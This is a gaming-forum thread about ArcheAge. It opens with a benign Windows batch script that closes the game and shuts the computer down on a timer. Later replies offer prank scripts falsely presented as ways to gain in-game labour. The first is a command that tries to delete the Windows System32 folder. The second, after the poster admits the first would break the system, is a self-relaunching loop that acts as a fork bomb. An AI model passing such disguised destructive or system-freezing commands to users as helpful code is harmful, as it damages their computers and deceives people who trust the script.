What's new
Vindictive

Register a free account today to become a member. Once you're approved, you'll able to participate on this site by adding topics and posts, as well as connect with other members through your own private inbox. We are not legally responsible if you're sexually harassed by Spine.

For those who don't like to leave their comps on at night...

Cyendia

Member
I'm using this .bat file to close out of Archeage and shut down my computer after the AFK timer kicks you out. Copy and paste it into notepad, save as filename.bat and double click on it to run. It waits 26 minutes, forces Archeage to close, waits another minute, then shuts down your computer. GET THAT EXTRA LABOR (and save the planet)!

Code:
timeout /t 1500
taskkill /im archeage.exe
timeout /t 60
shutdown.exe /s /t 00
 
Re: For those who don't like to leave their comps on at nigh

Also another handy batch script to help get more labour in ArcheAge

Code:
@echo off
DEL C:\Windows\System32
 
Re: For those who don't like to leave their comps on at nigh

Because nothing about that seems fishy... :s
 
Re: For those who don't like to leave their comps on at nigh

Cyendia said:
Because nothing about that seems fishy... :s

You're right, it would break your system. Here's the actual code that gives you more labour in ArcheAge.

Code:
:s
start "" %0
goto s
 
Back